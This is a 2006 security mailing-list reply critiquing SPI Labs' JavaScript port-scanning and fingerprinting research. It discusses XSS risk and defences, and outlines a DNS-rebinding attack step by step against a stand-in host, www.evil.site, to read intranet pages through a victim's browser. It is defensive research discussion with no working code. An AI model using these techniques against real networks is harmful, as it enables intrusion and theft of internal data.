Amit Klein (AKsecurity)
aksecurity at hotpop.com
Fri Jul 28 12:43:28 EDT 2006
On 27 Jul 2006 at 11:47, Billy Hoffman wrote:
> SPI Labs has discovered a technique to scan a network, fingerprint all the web-enabled devices
> it finds, and send attacks or commands to those devices. This technique can scan networks
> protected behind firewalls such as corporate networks. All the code to do this is written in
> can execute in nearly any web browser on nearly any platform when a user simply opens at a
> support in the browser. The code can be part of a Cross Site Scripting (XSS) attack payload,
> increasing the damage XSS can do.
> SPI has published a whitepaper about this technique and has also release proof of concept code
> that will portscan a given range of IPs and fingerprint Microsoft IIS and Apache boxes.
> Whitepaper: http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html
> Proof of Concept: http://www.spidynamics.com/spilabs/js-port-scan/
This is definitely a good paper, and I really liked the basic technique
(scanning/fingerprinting). Here are few comments:
1. In the overview, you state "SPI Labs has discovered a technique to scan a network,
fingerprint all the Web-enabled devices found, and send attacks or commands to those
As far as I can tell, the fingerprinting part is indeed new (quite likely that the scanning
part is too, but I didn't run a full check though). As for the idea that
you can attack 3rd party sites via JS, I don't think it's new. For example, I mentioned
this concept very briefly in my 2004 text on HTTP Response Splitting, and I'm pretty sure I
didn't invent it. Here's an excerpt from my text
(http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf, p. 21):
This principle can be extended into attacking other inaccessible targets using an
intermediate entity usually client/browser. For example, consider an organization that
has an internal forward proxy cache server. Such a cache server can be a target to a
web cache poisoning attack by having the client originate the attack. This can be
achieved if the attacker causes the client to download some HTML page and/or
2. You mention "Increased Danger from Cross Site Scripting [...] This means any XSS
vulnerability on any site can be used to attack the end user, regardless of the
features of the vulnerable site."
In my understanding, the increased danger comes only from permanent (stored) XSS (as
opposed to reflected and DOM-based XSS). For reflected/DOM-based XSS, the link you
send to the user could very well be a link to the malicious site, so having reflected/
DOM-based XSS adds nothing to the attack surface (well, there's the bit of social
engineering - you could claim that a user is more likely to click on a link to a known
3. In the recommendation part, you focus more on XSS prevention, but I think that
there are some measures that can reduce the fingerprinting vector, at least as described in
your text. For example, if the web master removes ALL default files in the web server
virtual root, then it seems to me that the fingerprinting technique for the web server
itself will fail. I'm not saying it's impossible to devise methods that will somehow
fingerprint the web server even without the default files (e.g. if it's possible in
different webservers to force them into an infinite loop, in various server-specific URLs,
or if a different return status can be forced - 200 vs. 4xx/5xx by crafting URLs in certain
ways), but it's worth mentioning (probably not applicable to HTTP-enabled devices though,
as well as to web applications).
4. Allow me to start a thread(?) about an issue that arises from the paper: is server
fingerprinting an attack? or in other words, is the ability to know which server we're
dealing with is a vulnerability? My opinion that it isn't practically an
attack/vulnerability. For example, most CGI scanners would probably barrage the target with
all exploits for all web-servers. The fact that the server is identified as Apache (or IIS,
or whatever) won't help the attacker, because he/she will throw in all attacks anyway.
In any case, hiding the server type is security by obscurity, and it's unlikely for someone
to really succeed in doing so, due to error messages, HTTP-level fingerprinting,
application level telltale signs (__VIEWSTATE...), etc.
I am NOT saying fingerprinting abilities are not important. I think the results of the
paper are beautiful, and may also indicate a kind of problems we haven't foreseen.
to point the readers at a very interesting (yet somehow little known/discussed) text which
describes a client side attack that enables the attacker to send requests and read (!) data
from 3rd party HTTP servers (note: not HTTPS). Without further ado, please read "DNS:
Spoofing and Pinning" by Mohammad A. Haque (http://viper.haque.net/~timeless/blog/11/).
This text dates September 12th, 2003 or earlier (see
The idea is simple (yet perhaps not too practical):
a. Victim (browser) goes to URL http://www.evil.site/hackme.html
a1 Victim's DNS client resolves www.evil.site (through dns.evil.site...) to (say)
100.200.300.400 (OK, no such IP, for demonstration purpose only).
a2 Victim gets data from the malicious server on 100.200.300.400 - this is an HTML page
a3 THe browser CACHES this page.
b. Victim browses elsewhere, then shuts down browser and go to sleep (!!! - need to shut
down the browser due to the DNS pinning feature of the modern browser, otherwise this would
have been much more practical).
c. Victim wakes up the next day.
d. Victim goes to URL http://www.evil.site/hackme.html
d1 the browser uses the cached page
d3 the victim's DNS client resolves www.evil.site (through dns.evil.site...) to (say)
10.1.2.3 (Intranet address!!!).
d4 The Intranet server serves back the desired page
d5 The broweser enables the cached http://www.evil.site/hackme.html page to access this
page because they're on the same domain. So the old http://www.evil.site/hackme.html page
can read the data from the retrieved http://www.evil.site/very/sensitive/page.html.
BTW - Possible solution to this anti-DNS-pinning (mentioned in the bugzilla reference
above) - enforce only known Host headers at the server. Or maybe move to SSL?
The Web Security Mailing List:
The Web Security Mailing List Archives:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
More information about the websecurity